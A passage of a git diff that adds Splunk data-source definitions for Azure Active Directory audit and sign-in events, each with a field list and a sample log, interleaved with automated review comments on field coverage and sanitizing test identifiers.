+- properties.activityDateTime
+- properties.activityDisplayName
+- properties.additionalDetails{}.key
+- properties.additionalDetails{}.value
+- properties.category
+- properties.correlationId
+- properties.id
+- properties.initiatedBy.user.displayName
+- properties.initiatedBy.user.id
+- properties.initiatedBy.user.ipAddress
+- properties.initiatedBy.user.userPrincipalName
+- properties.loggedByService
+- properties.operationType
+- properties.result
+- properties.resultReason
+- properties.targetResources{}.displayName
+- properties.targetResources{}.id
+- properties.targetResources{}.modifiedProperties{}.displayName
+- properties.targetResources{}.modifiedProperties{}.newValue
+- properties.targetResources{}.modifiedProperties{}.oldValue
+- properties.targetResources{}.type
+- properties.userAgent
+- punct
+- resourceId
+- resultDescription
+- resultSignature
+- source
+- sourcetype
+- splunk_server
+- tag
+- tag::eventtype
+- tenantId
+- time
+- timeendpos
+- timestartpos
+example_log: '{"time": "2023-10-27T16:14:14.9747033Z", "resourceId": "/tenants/75243ab2-44f8-435c-a7a6-b479385df6d4/providers/Microsoft.aadiam",
+ "operationName": "Consent to application", "operationVersion": "1.0", "category":
+ "AuditLogs", "tenantId": "75243ab2-44f8-435c-a7a6-b479385df6d4", "resultSignature":
+ "None", "resultDescription": "Microsoft.Online.Security.UserConsentBlockedForRiskyAppsException",
+ "durationMs": 0, "callerIpAddress": "13.85.188.242", "correlationId": "864210f1-2950-47cb-9e12-1a71dcbdb1d5",
+ "Level": 4, "properties": {"id": "Directory_864210f1-2950-47cb-9e12-1a71dcbdb1d5_DO21D_338329364",
+ "category": "ApplicationManagement", "correlationId": "864210f1-2950-47cb-9e12-1a71dcbdb1d5",
+ "result": "failure", "resultReason": "Microsoft.Online.Security.UserConsentBlockedForRiskyAppsException",
+ "activityDisplayName": "Consent to application", "activityDateTime": "2023-10-27T16:14:14.9747033+00:00",
+ "loggedByService": "Core Directory", "operationType": "Assign", "userAgent": null,
+ "initiatedBy": {"user": {"id": "57e4bd36-9722-4a4a-9729-7203d8e00b72", "displayName":
+ null, "userPrincipalName": "user15@splunkresearch.onmicrosoft.com", "ipAddress":
+ "13.85.188.242", "roles": []}}, "targetResources": [{"id": "6228c72e-8895-4681-bbda-238132dc4f3c",
+ "displayName": "Bad App 1", "type": "Application", "modifiedProperties": [{"displayName":
+ "ConsentContext.IsAdminConsent", "oldValue": null, "newValue": "\"False\""}, {"displayName":
+ "ConsentContext.IsAppOnly", "oldValue": null, "newValue": "\"False\""}, {"displayName":
+ "ConsentContext.OnBehalfOfAll", "oldValue": null, "newValue": "\"False\""}, {"displayName":
+ "ConsentContext.Tags", "oldValue": null, "newValue": "\"WindowsAzureActiveDirectoryIntegratedApp\""},
+ {"displayName": "ConsentAction.Permissions", "oldValue": null, "newValue": "\"[]
+ => [[Id: AAAAAAAAAAAAAAAAAAAAALSZcc5Sj_NGtUtP2B3pYeI2veRXIpdKSpcpcgPY4Aty, ClientId:
+ 00000000-0000-0000-0000-000000000000, PrincipalId: 57e4bd36-9722-4a4a-9729-7203d8e00b72,
+ ResourceId: ce7199b4-8f52-46f3-b54b-4fd81de961e2, ConsentType: Principal, Scope:
+ Mail.Read Mail.Read.Shared Mail.ReadBasic Mail.ReadBasic.Shared Mail.ReadWrite Mail.ReadWrite.Shared
+ Mail.Send Mail.Send.Shared User.Read, CreatedDateTime: , LastModifiedDateTime ]];
+ \""}, {"displayName": "ConsentAction.Reason", "oldValue": null, "newValue": "\"Risky
+ application detected\""}, {"displayName": "MethodExecutionResult.", "oldValue":
+ null, "newValue": "\"Microsoft.Online.Security.UserConsentBlockedForRiskyAppsException\""}],
+ "administrativeUnits": []}], "additionalDetails": [{"key": "User-Agent", "value":
+ "EvoSTS"}, {"key": "AppId", "value": "96f6a3d6-d5aa-4af5-a77a-9319b5283712"}]}}'
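Review bot: `resultDescription` appears in this field list only because the sample is a blocked consent (`"result": "failure"`, `UserConsentBlockedForRiskyAppsException`); no other Azure AD object in this commit lists it, and a successful consent event presumably does not carry it. That is useful to state, since a detection for consent grants that filters on `resultDescription` would silently miss the success path. A comment such as `# sample is a failure event; resultDescription is not expected on successful consents` next to `- resultDescription` would capture it.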
diff --git a/data_sources/azure_active_directory_disable_strong_authentication.yml b/data_sources/azure_active_directory_disable_strong_authentication.yml
new file mode 100644
index 0000000000..eee28e781d
--- /dev/null
+++ b/data_sources/azure_active_directory_disable_strong_authentication.yml
@@ -0,0 +1,80 @@
+name: Azure Active Directory Disable Strong Authentication
+id: 8f31966d-c496-496d-8837-f7fd11f31255
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Azure Active Directory Disable Strong Authentication
+source: Azure AD
+sourcetype: azure:monitor:aad
+separator: operationName
+supported_TA:
+- name: Splunk Add-on for Microsoft Cloud Services
+ url: https://splunkbase.splunk.com/app/3110
+ version: 5.2.2
+fields:
+- _time
+- Level
+- category
+- correlationId
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- durationMs
+- host
+- index
+- linecount
+- operationName
+- operationVersion
+- properties.activityDateTime
+- properties.activityDisplayName
+- properties.category
+- properties.correlationId
+- properties.id
+- properties.initiatedBy.user.displayName
+- properties.initiatedBy.user.id
+- properties.initiatedBy.user.ipAddress
+- properties.initiatedBy.user.userPrincipalName
+- properties.loggedByService
+- properties.operationType
+- properties.result
+- properties.resultReason
+- properties.targetResources{}.displayName
+- properties.targetResources{}.id
+- properties.targetResources{}.modifiedProperties{}.displayName
+- properties.targetResources{}.modifiedProperties{}.newValue
+- properties.targetResources{}.modifiedProperties{}.oldValue
+- properties.targetResources{}.type
+- properties.targetResources{}.userPrincipalName
+- properties.userAgent
+- punct
+- resourceId
+- resultSignature
+- source
+- sourcetype
+- splunk_server
+- tenantId
+- time
+- timeendpos
+- timestartpos
+example_log: '{"time": "2023-07-11T00:01:35.0251899Z", "resourceId": "/tenants/fc69e276-e9e8-4af9-9002-1e410d77244e/providers/Microsoft.aadiam",
+ "operationName": "Disable Strong Authentication", "operationVersion": "1.0", "category":
+ "AuditLogs", "tenantId": "fc69e276-e9e8-4af9-9002-1e410d77244e", "resultSignature":
+ "None", "durationMs": 0, "correlationId": "7e3ee05c-ce4f-4ff1-8230-55555c25c97e",
+ "Level": 4, "properties": {"id": "Directory_7e3ee05c-ce4f-4ff1-8230-55555c25c97e_DADCR_14299826",
+ "category": "UserManagement", "correlationId": "7e3ee05c-ce4f-4ff1-8230-55555c25c97e",
+ "result": "success", "resultReason": "", "activityDisplayName": "Disable Strong
+ Authentication", "activityDateTime": "2023-07-11T00:01:35.0251899+00:00", "loggedByService":
+ "Core Directory", "operationType": "Update", "userAgent": null, "initiatedBy": {"user":
+ {"id": "728989f4-eb3d-45c2-8741-2f2af4e485ce", "displayName": null, "userPrincipalName":
+ "oops@splunkresearch.com", "ipAddress": "", "roles": []}}, "targetResources": [{"id":
+ "94b969a3-11cb-4075-a1fd-9fee3daf692e", "displayName": null, "type": "User", "userPrincipalName":
+ "Abigail.Clark@splunkresearch.com", "modifiedProperties": [{"displayName": "StrongAuthenticationRequirement",
+ "oldValue": "[{\"RelyingParty\":\"*\",\"State\":1,\"RememberDevicesNotIssuedBefore\":\"2023-07-11T00:01:26+00:00\"}]",
+ "newValue": "[]"}, {"displayName": "Included Updated Properties", "oldValue": null,
+ "newValue": "\"StrongAuthenticationRequirement\""}], "administrativeUnits": []}],
+ "additionalDetails": []}}'
diff --git a/data_sources/azure_active_directory_enable_account.yml b/data_sources/azure_active_directory_enable_account.yml
new file mode 100644
index 0000000000..276c8accce
--- /dev/null
+++ b/data_sources/azure_active_directory_enable_account.yml
@@ -0,0 +1,81 @@
+name: Azure Active Directory Enable account
+id: cb49f3cd-04ad-415c-a5ed-9b27b2829fa7
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Azure Active Directory Enable account
+source: Azure AD
+sourcetype: azure:monitor:aad
+separator: operationName
+supported_TA:
+- name: Splunk Add-on for Microsoft Cloud Services
+ url: https://splunkbase.splunk.com/app/3110
+ version: 5.2.2
+fields:
+- _time
+- Level
+- callerIpAddress
+- category
+- correlationId
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- durationMs
+- host
+- index
+- linecount
+- operationName
+- operationVersion
+- properties.activityDateTime
+- properties.activityDisplayName
+- properties.category
+- properties.correlationId
+- properties.id
+- properties.initiatedBy.user.displayName
+- properties.initiatedBy.user.id
+- properties.initiatedBy.user.ipAddress
+- properties.initiatedBy.user.userPrincipalName
+- properties.loggedByService
+- properties.operationType
+- properties.result
+- properties.resultReason
+- properties.targetResources{}.displayName
+- properties.targetResources{}.id
+- properties.targetResources{}.modifiedProperties{}.displayName
+- properties.targetResources{}.modifiedProperties{}.newValue
+- properties.targetResources{}.modifiedProperties{}.oldValue
+- properties.targetResources{}.type
+- properties.targetResources{}.userPrincipalName
+- properties.userAgent
+- punct
+- resourceId
+- resultSignature
+- source
+- sourcetype
+- splunk_server
+- tenantId
+- time
+- timeendpos
+- timestartpos
+example_log: '{"time": "2023-07-24T14:28:15.2223487Z", "resourceId": "/tenants/fc69e276-e9e8-4af9-9002-1e410d77244e/providers/Microsoft.aadiam",
+ "operationName": "Enable account", "operationVersion": "1.0", "category": "AuditLogs",
+ "tenantId": "fc69e276-e9e8-4af9-9002-1e410d77244e", "resultSignature": "None", "durationMs":
+ 0, "callerIpAddress": "2601:646:a000:200:b0ee:600c:de8a:c7d5", "correlationId":
+ "d34f6d2e-3120-4b96-b922-e06090f6a497", "Level": 4, "properties": {"id": "Directory_d34f6d2e-3120-4b96-b922-e06090f6a497_VPRLA_316413188",
+ "category": "UserManagement", "correlationId": "d34f6d2e-3120-4b96-b922-e06090f6a497",
+ "result": "success", "resultReason": "", "activityDisplayName": "Enable account",
+ "activityDateTime": "2023-07-24T14:28:15.2223487+00:00", "loggedByService": "Core
+ Directory", "operationType": "Update", "userAgent": null, "initiatedBy": {"user":
+ {"id": "728989f4-eb3d-45c2-8741-2f2af4e485ce", "displayName": null, "userPrincipalName":
+ "tommyr@splunkresearch.com", "ipAddress": "2601:646:a000:200:b0ee:600c:de8a:c7d5",
+ "roles": []}}, "targetResources": [{"id": "83a3158c-1d08-4686-b5f9-72fb34cb606e",
+ "displayName": null, "type": "User", "userPrincipalName": "testuser@splunkresearch.com",
+ "modifiedProperties": [{"displayName": "AccountEnabled", "oldValue": "[false]",
+ "newValue": "[true]"}, {"displayName": "Included Updated Properties", "oldValue":
+ null, "newValue": "\"AccountEnabled\""}], "administrativeUnits": []}], "additionalDetails":
+ []}}'
diff --git a/data_sources/azure_active_directory_invite_external_user.yml b/data_sources/azure_active_directory_invite_external_user.yml
new file mode 100644
index 0000000000..5e3cd3df64
--- /dev/null
+++ b/data_sources/azure_active_directory_invite_external_user.yml
@@ -0,0 +1,82 @@
+name: Azure Active Directory Invite external user
+id: d3818bd5-f283-4518-8b67-df19240c3e40
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Azure Active Directory Invite external user
+source: Azure AD
+sourcetype: azure:monitor:aad
+separator: operationName
+supported_TA:
+- name: Splunk Add-on for Microsoft Cloud Services
+ url: https://splunkbase.splunk.com/app/3110
+ version: 5.2.2
+fields:
+- _time
+- Level
+- callerIpAddress
+- category
+- correlationId
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- durationMs
+- host
+- index
+- linecount
+- operationName
+- operationVersion
+- properties.activityDateTime
+- properties.activityDisplayName
+- properties.additionalDetails{}.key
+- properties.additionalDetails{}.value
+- properties.category
+- properties.correlationId
+- properties.id
+- properties.initiatedBy.user.displayName
+- properties.initiatedBy.user.id
+- properties.initiatedBy.user.ipAddress
+- properties.initiatedBy.user.userPrincipalName
+- properties.loggedByService
+- properties.operationType
+- properties.result
+- properties.resultReason
+- properties.targetResources{}.displayName
+- properties.targetResources{}.id
+- properties.targetResources{}.type
+- properties.targetResources{}.userPrincipalName
+- properties.userAgent
+- punct
+- resourceId
+- resultSignature
+- source
+- sourcetype
+- splunk_server
+- tenantId
+- time
+- timeendpos
+- timestartpos
+example_log: '{"time": "2023-07-13T00:29:59.5100003Z", "resourceId": "/tenants/fc69e276-e9e8-4af9-9002-1e410d77244e/providers/Microsoft.aadiam",
+ "operationName": "Invite external user", "operationVersion": "1.0", "category":
+ "AuditLogs", "tenantId": "fc69e276-e9e8-4af9-9002-1e410d77244e", "resultSignature":
+ "None", "durationMs": 0, "callerIpAddress": "40.126.4.40", "correlationId": "e7d580a6-eaac-4f82-843c-40b0b5f3cf99",
+ "Level": 4, "properties": {"id": "Invited Users_e7d580a6-eaac-4f82-843c-40b0b5f3cf99_YNUMP_7291793",
+ "category": "UserManagement", "correlationId": "e7d580a6-eaac-4f82-843c-40b0b5f3cf99",
+ "result": "success", "resultReason": null, "activityDisplayName": "Invite external
+ user", "activityDateTime": "2023-07-13T00:29:59.5100003+00:00", "loggedByService":
+ "Invited Users", "operationType": "Add", "userAgent": null, "initiatedBy": {"user":
+ {"id": "728989f4-eb3d-45c2-8741-2f2af4e485ce", "displayName": null, "userPrincipalName":
+ "oopsr@splunkresearch.com", "ipAddress": "40.126.4.40", "roles": []}}, "targetResources":
+ [{"id": "f416526a-17ee-4129-8ca9-f5ee55f69f34", "displayName": "oops", "type": "User",
+ "userPrincipalName": "oops360_gmail.com#EXT#@strtadminsplunkresearch.onmicrosoft.com",
+ "modifiedProperties": [], "administrativeUnits": []}], "additionalDetails": [{"key":
+ "oid", "value": "728989f4-eb3d-45c2-8741-2f2af4e485ce"}, {"key": "tid", "value":
+ "fc69e276-e9e8-4af9-9002-1e410d77244e"}, {"key": "ipaddr", "value": "2601:646:a000:200:c4db:f288:7e28:21b3"},
+ {"key": "wids", "value": "62e90394-69f5-4237-9190-012177145e10"}, {"key": "InvitationId",
+ "value": "65c7d12f-c6f3-44f0-8fad-4f57a1020484"}, {"key": "invitedUserEmailAddress",
+ "value": "oops360@gmail.com"}]}}'
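Review bot: The example_log in this new file embeds what looks like a real third-party mailbox (`oops360@gmail.com` in the invitedUserEmailAddress detail) and a specific client IPv6 address in the `ipaddr` detail, while the sign-in and authorization-policy examples in the same commit use the placeholder `1.2.3.4`. These files ship as documentation, so I would sanitize them consistently — a mailbox under a reserved domain such as `invitee@example.com` and a documentation-range IP — so the corpus does not carry personal identifiers. The same applies to the caller and initiator addresses in the reset-password, set-domain-authentication, update-user and user-registered-security-info hunks below.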
diff --git a/data_sources/azure_active_directory_reset_password_(by_admin).yml b/data_sources/azure_active_directory_reset_password_(by_admin).yml
new file mode 100644
index 0000000000..f0906c6408
--- /dev/null
+++ b/data_sources/azure_active_directory_reset_password_(by_admin).yml
@@ -0,0 +1,79 @@
+name: Azure Active Directory Reset password (by admin)
+id: dcd0e4dc-68f8-4b77-a66f-89c57b3afa6b
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Azure Active Directory Reset password (by admin)
+source: Azure AD
+sourcetype: azure:monitor:aad
+separator: operationName
+supported_TA:
+- name: Splunk Add-on for Microsoft Cloud Services
+ url: https://splunkbase.splunk.com/app/3110
+ version: 5.2.2
+fields:
+- _time
+- Level
+- callerIpAddress
+- category
+- correlationId
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- durationMs
+- host
+- index
+- linecount
+- operationName
+- operationVersion
+- properties.activityDateTime
+- properties.activityDisplayName
+- properties.additionalDetails{}.key
+- properties.additionalDetails{}.value
+- properties.category
+- properties.correlationId
+- properties.id
+- properties.initiatedBy.user.displayName
+- properties.initiatedBy.user.id
+- properties.initiatedBy.user.ipAddress
+- properties.initiatedBy.user.userPrincipalName
+- properties.loggedByService
+- properties.operationType
+- properties.result
+- properties.resultReason
+- properties.targetResources{}.displayName
+- properties.targetResources{}.id
+- properties.targetResources{}.type
+- properties.targetResources{}.userPrincipalName
+- properties.userAgent
+- punct
+- resourceId
+- resultDescription
+- resultSignature
+- source
+- sourcetype
+- splunk_server
+- tenantId
+- time
+- timeendpos
+- timestartpos
+example_log: '{"time": "2023-07-24T14:28:55.0648789Z", "resourceId": "/tenants/fc69e276-e9e8-4af9-9002-1e410d77244e/providers/Microsoft.aadiam",
+ "operationName": "Reset password (by admin)", "operationVersion": "1.0", "category":
+ "AuditLogs", "tenantId": "fc69e276-e9e8-4af9-9002-1e410d77244e", "resultSignature":
+ "None", "resultDescription": "None", "durationMs": 0, "callerIpAddress": "40.81.4.144",
+ "correlationId": "724ff6ae-0f36-4f2f-a20f-f043e0c73006", "Level": 4, "properties":
+ {"id": "SSPR_724ff6ae-0f36-4f2f-a20f-f043e0c73006_P1CQE_8605821", "category": "UserManagement",
+ "correlationId": "724ff6ae-0f36-4f2f-a20f-f043e0c73006", "result": "success", "resultReason":
+ "None", "activityDisplayName": "Reset password (by admin)", "activityDateTime":
+ "2023-07-24T14:28:55.0648789+00:00", "loggedByService": "Self-service Password Management",
+ "operationType": "Update", "userAgent": null, "initiatedBy": {"user": {"id": "728989f4-eb3d-45c2-8741-2f2af4e485ce",
+ "displayName": null, "userPrincipalName": "tommyr@splunkresearch.com", "ipAddress":
+ "40.81.4.144", "roles": []}}, "targetResources": [{"id": "83a3158c-1d08-4686-b5f9-72fb34cb606e",
+ "displayName": "test", "type": "User", "userPrincipalName": "testuser@splunkresearch.com",
+ "modifiedProperties": [], "administrativeUnits": []}], "additionalDetails": [{"key":
+ "OnPremisesAgent", "value": "None"}]}}'
diff --git a/data_sources/azure_active_directory_set_domain_authentication.yml b/data_sources/azure_active_directory_set_domain_authentication.yml
new file mode 100644
index 0000000000..e8276c7521
--- /dev/null
+++ b/data_sources/azure_active_directory_set_domain_authentication.yml
@@ -0,0 +1,83 @@
+name: Azure Active Directory Set domain authentication
+id: e7bcdab9-908c-40ab-ba38-5db54fa87750
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Azure Active Directory Set domain authentication
+source: Azure AD
+sourcetype: azure:monitor:aad
+separator: operationName
+supported_TA:
+- name: Splunk Add-on for Microsoft Cloud Services
+ url: https://splunkbase.splunk.com/app/3110
+ version: 5.2.2
+fields:
+- _time
+- Level
+- callerIpAddress
+- category
+- correlationId
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- durationMs
+- host
+- index
+- linecount
+- operationName
+- operationVersion
+- properties.activityDateTime
+- properties.activityDisplayName
+- properties.additionalDetails{}.key
+- properties.additionalDetails{}.value
+- properties.category
+- properties.correlationId
+- properties.id
+- properties.initiatedBy.user.displayName
+- properties.initiatedBy.user.id
+- properties.initiatedBy.user.ipAddress
+- properties.initiatedBy.user.userPrincipalName
+- properties.loggedByService
+- properties.operationType
+- properties.result
+- properties.resultReason
+- properties.targetResources{}.displayName
+- properties.targetResources{}.id
+- properties.targetResources{}.modifiedProperties{}.displayName
+- properties.targetResources{}.modifiedProperties{}.newValue
+- properties.targetResources{}.modifiedProperties{}.oldValue
+- properties.userAgent
+- punct
+- resourceId
+- resultSignature
+- source
+- sourcetype
+- splunk_server
+- tenantId
+- time
+- timeendpos
+- timestartpos
+example_log: '{"time": "2023-07-26T13:44:59.0372448Z", "resourceId": "/tenants/fc69e276-e9e8-4af9-9002-1e410d77244e/providers/Microsoft.aadiam",
+ "operationName": "Set domain authentication", "operationVersion": "1.0", "category":
+ "AuditLogs", "tenantId": "fc69e276-e9e8-4af9-9002-1e410d77244e", "resultSignature":
+ "None", "durationMs": 0, "callerIpAddress": "2601:646:a000:200:6419:f55c:946d:17d1",
+ "correlationId": "57e60ecc-17b8-4ab5-815e-d538e1ca32a4", "Level": 4, "properties":
+ {"id": "Directory_57e60ecc-17b8-4ab5-815e-d538e1ca32a4_XDHHZ_434456733", "category":
+ "DirectoryManagement", "correlationId": "57e60ecc-17b8-4ab5-815e-d538e1ca32a4",
+ "result": "success", "resultReason": "", "activityDisplayName": "Add unverified
+ domain", "activityDateTime": "2023-07-26T13:44:59.0372448+00:00", "loggedByService":
+ "Core Directory", "operationType": "Add", "userAgent": null, "initiatedBy": {"user":
+ {"id": "728989f4-eb3d-45c2-8741-2f2af4e485ce", "displayName": null, "userPrincipalName":
+ "tommyr@splunkresearch.com", "ipAddress": "2601:646:a000:200:6419:f55c:946d:17d1",
+ "roles": []}}, "targetResources": [{"id": null, "displayName": "newdomain.com",
+ "modifiedProperties": [{"displayName": "Name", "oldValue": "[\"\"]", "newValue":
+ "[\"newdomain.com\"]"}, {"displayName": "LiveType", "oldValue": "[\"None\"]", "newValue":
+ "[\"Managed\"]"}, {"displayName": "Included Updated Properties", "oldValue": null,
+ "newValue": "\"Name,LiveType\""}], "administrativeUnits": []}], "additionalDetails":
+ [{"key": "User-Agent", "value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)
+ AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"}]}}'
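Review bot: The example_log's `activityDisplayName` is `Add unverified domain` while its `operationName` is `Set domain authentication`, so the event does not obviously illustrate the operation this data source is named for. With `separator: operationName` the split still works, but a detection author reading the example may expect the two to agree; either swap in an event whose activityDisplayName matches, or add a comment above `example_log:` such as `# Azure reports the domain-creation activity under operationName "Set domain authentication"`. The example's target resource also has `"id": null` and no `type`, which is presumably why `properties.targetResources{}.type` is absent from this field list but present in the sibling data sources; worth stating, since consumers joining on targetResources id will see nulls here.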
diff --git a/data_sources/azure_active_directory_sign_in_activity.yml b/data_sources/azure_active_directory_sign_in_activity.yml
new file mode 100644
index 0000000000..8f4d42c2e2
--- /dev/null
+++ b/data_sources/azure_active_directory_sign_in_activity.yml
@@ -0,0 +1,161 @@
+name: Azure Active Directory Sign-in activity
+id: f9ed0a3a-9e20-4198-a035-d0a29593fbe0
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Azure Active Directory Sign-in activity
+source: Azure AD
+sourcetype: azure:monitor:aad
+separator: operationName
+supported_TA:
+- name: Splunk Add-on for Microsoft Cloud Services
+ url: https://splunkbase.splunk.com/app/3110
+ version: 5.2.2
+fields:
+- _time
+- Level
+- callerIpAddress
+- category
+- correlationId
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- durationMs
+- host
+- identity
+- index
+- linecount
+- location
+- operationName
+- operationVersion
+- properties.alternateSignInName
+- properties.appDisplayName
+- properties.appId
+- properties.appServicePrincipalId
+- properties.authenticationDetails{}.RequestSequence
+- properties.authenticationDetails{}.StatusSequence
+- properties.authenticationDetails{}.authenticationMethod
+- properties.authenticationDetails{}.authenticationMethodDetail
+- properties.authenticationDetails{}.authenticationStepDateTime
+- properties.authenticationDetails{}.authenticationStepRequirement
+- properties.authenticationDetails{}.authenticationStepResultDetail
+- properties.authenticationDetails{}.succeeded
+- properties.authenticationProcessingDetails{}.key
+- properties.authenticationProcessingDetails{}.value
+- properties.authenticationProtocol
+- properties.authenticationRequirement
+- properties.authenticationRequirementPolicies{}.detail
+- properties.authenticationRequirementPolicies{}.requirementProvider
+- properties.autonomousSystemNumber
+- properties.clientAppUsed
+- properties.clientCredentialType
+- properties.conditionalAccessStatus
+- properties.correlationId
+- properties.createdDateTime
+- properties.crossTenantAccessType
+- properties.deviceDetail.deviceId
+- properties.deviceDetail.operatingSystem
+- properties.flaggedForReview
+- properties.homeTenantId
+- properties.id
+- properties.incomingTokenType
+- properties.ipAddress
+- properties.isInteractive
+- properties.isTenantRestricted
+- properties.location.city
+- properties.location.countryOrRegion
+- properties.location.geoCoordinates.latitude
+- properties.location.geoCoordinates.longitude
+- properties.location.state
+- properties.originalRequestId
+- properties.originalTransferMethod
+- properties.processingTimeInMilliseconds
+- properties.resourceDisplayName
+- properties.resourceId
+- properties.resourceServicePrincipalId
+- properties.resourceTenantId
+- properties.riskDetail
+- properties.riskLevelAggregated
+- properties.riskLevelDuringSignIn
+- properties.riskState
+- properties.rngcStatus
+- properties.servicePrincipalId
+- properties.signInIdentifier
+- properties.signInTokenProtectionStatus
+- properties.ssoExtensionVersion
+- properties.status.additionalDetails
+- properties.status.errorCode
+- properties.status.failureReason
+- properties.tenantId
+- properties.tokenIssuerName
+- properties.tokenIssuerType
+- properties.uniqueTokenIdentifier
+- properties.userAgent
+- properties.userDisplayName
+- properties.userId
+- properties.userPrincipalName
+- properties.userType
+- punct
+- resourceId
+- resultDescription
+- resultSignature
+- resultType
+- source
+- sourcetype
+- splunk_server
+- tenantId
+- time
+- timeendpos
+- timestartpos
+example_log: '{"time": "2023-10-24T20:13:31.4449614Z", "resourceId": "/tenants/887c9144-28b8-431b-885b-764fdeefcf62/providers/Microsoft.aadiam",
+ "operationName": "Sign-in activity", "operationVersion": "1.0", "category": "SignInLogs",
+ "tenantId": "887c9144-28b8-431b-885b-764fdeefcf62", "resultType": "50076", "resultSignature":
+ "None", "resultDescription": "Due to a configuration change made by your administrator,
+ or because you moved to a new location, you must use multi-factor authentication
+ to access the resource.", "durationMs": 0, "callerIpAddress": "1.2.3.4", "correlationId":
+ "1f577997-0710-4bd4-848e-5854f748f7dc", "identity": "user15", "Level": 4, "location":
+ "US", "properties": {"id": "22608a25-1d9b-44b5-b0f2-cb94f06b2d00", "createdDateTime":
+ "2023-10-24T20:01:11.9490387+00:00", "userDisplayName": "user15", "userPrincipalName":
+ "user15@splunkresearch.onmicrosoft.com", "userId": "57e4bd36-9722-4a4a-9729-7203d8e00b72",
+ "appId": "1b730954-1685-4b74-9bfd-dac224a7b894", "appDisplayName": "Azure Active
+ Directory PowerShell", "ipAddress": "1.2.3.4", "status": {"errorCode": 50076, "failureReason":
+ "Due to a configuration change made by your administrator, or because you moved
+ to a new location, you must use multi-factor authentication to access the resource.",
+ "additionalDetails": "MFA required in Azure AD"}, "clientAppUsed": "Mobile Apps
+ and Desktop clients", "userAgent": "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US)
+ WindowsPowerShell/5.1.22621.2428", "deviceDetail": {"deviceId": "", "operatingSystem":
+ "Windows"}, "location": {"city": "Rochester", "state": "New York", "countryOrRegion":
+ "US", "geoCoordinates": {"latitude": 20.756160123483984, "longitude": -73.99697875976562}},
+ "mfaDetail": {}, "correlationId": "1f577997-0710-4bd4-848e-5854f748f7dc", "conditionalAccessStatus":
+ "notApplied", "appliedConditionalAccessPolicies": [], "authenticationContextClassReferences":
+ [], "originalRequestId": "22608a25-1d9b-44b5-b0f2-cb94f06b2d00", "isInteractive":
+ true, "tokenIssuerName": "", "tokenIssuerType": "AzureAD", "authenticationProcessingDetails":
+ [{"key": "Legacy TLS (TLS 1.0, 1.1, 3DES)", "value": "False"}, {"key": "Is CAE Token",
+ "value": "False"}], "networkLocationDetails": [], "clientCredentialType": "none",
+ "processingTimeInMilliseconds": 72, "riskDetail": "none", "riskLevelAggregated":
+ "none", "riskLevelDuringSignIn": "none", "riskState": "none", "riskEventTypes":
+ [], "riskEventTypes_v2": [], "resourceDisplayName": "Windows Azure Active Directory",
+ "resourceId": "00000002-0000-0000-c000-000000000000", "resourceTenantId": "887c9144-28b8-431b-885b-764fdeefcf62",
+ "homeTenantId": "887c9144-28b8-431b-885b-764fdeefcf62", "tenantId": "887c9144-28b8-431b-885b-764fdeefcf62",
+ "authenticationDetails": [{"authenticationStepDateTime": "2023-10-24T20:01:11.9490387+00:00",
+ "authenticationMethod": "Password", "authenticationMethodDetail": "Password in the
+ cloud", "succeeded": true, "authenticationStepResultDetail": "Correct password",
+ "authenticationStepRequirement": "Primary authentication", "StatusSequence": 0,
+ "RequestSequence": 1}, {"authenticationStepDateTime": "2023-10-24T20:01:11.9490387+00:00",
+ "succeeded": false, "authenticationStepResultDetail": "MFA required in Azure AD",
+ "authenticationStepRequirement": "Primary authentication"}], "authenticationRequirementPolicies":
+ [{"requirementProvider": "user", "detail": "Per-user MFA"}], "sessionLifetimePolicies":
+ [], "authenticationRequirement": "multiFactorAuthentication", "alternateSignInName":
+ "user15@splunkresearch.onmicrosoft.com", "signInIdentifier": "user15@splunkresearch.onmicrosoft.com",
+ "servicePrincipalId": "", "userType": "Member", "flaggedForReview": false, "isTenantRestricted":
+ false, "autonomousSystemNumber": 12271, "crossTenantAccessType": "none", "privateLinkDetails":
+ {}, "ssoExtensionVersion": "", "uniqueTokenIdentifier": "JYpgIpsdtUSw8suU8GstAA",
+ "authenticationStrengths": [], "incomingTokenType": "none", "authenticationProtocol":
+ "ropc", "appServicePrincipalId": null, "resourceServicePrincipalId": "56ad242f-e13b-47fc-8de8-19e3bf6f6575",
+ "rngcStatus": 0, "signInTokenProtectionStatus": "none", "originalTransferMethod":
+ "none"}}'
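Review bot: The field list omits `properties.appliedConditionalAccessPolicies{}.*` and `properties.mfaDetail.*`, presumably because the single example carries them empty (`[]` / `{}`); those are the fields sign-in detections most often key on, so a list derived from one event will under-report what this sourcetype actually extracts. Consider documenting the derivation with a comment above `fields:` such as `# fields: extractions observed in the example_log event only; nested objects that were empty in it are not listed`, or regenerating from a sample that exercises them.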
diff --git a/data_sources/azure_active_directory_update_application.yml b/data_sources/azure_active_directory_update_application.yml
new file mode 100644
index 0000000000..6f09efb5bc
--- /dev/null
+++ b/data_sources/azure_active_directory_update_application.yml
@@ -0,0 +1,83 @@
+name: Azure Active Directory Update application
+id: 2c08188a-ba25-496e-87c7-803cf28b6c90
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Azure Active Directory Update application
+source: Azure AD
+sourcetype: azure:monitor:aad
+separator: operationName
+supported_TA:
+- name: Splunk Add-on for Microsoft Cloud Services
+ url: https://splunkbase.splunk.com/app/3110
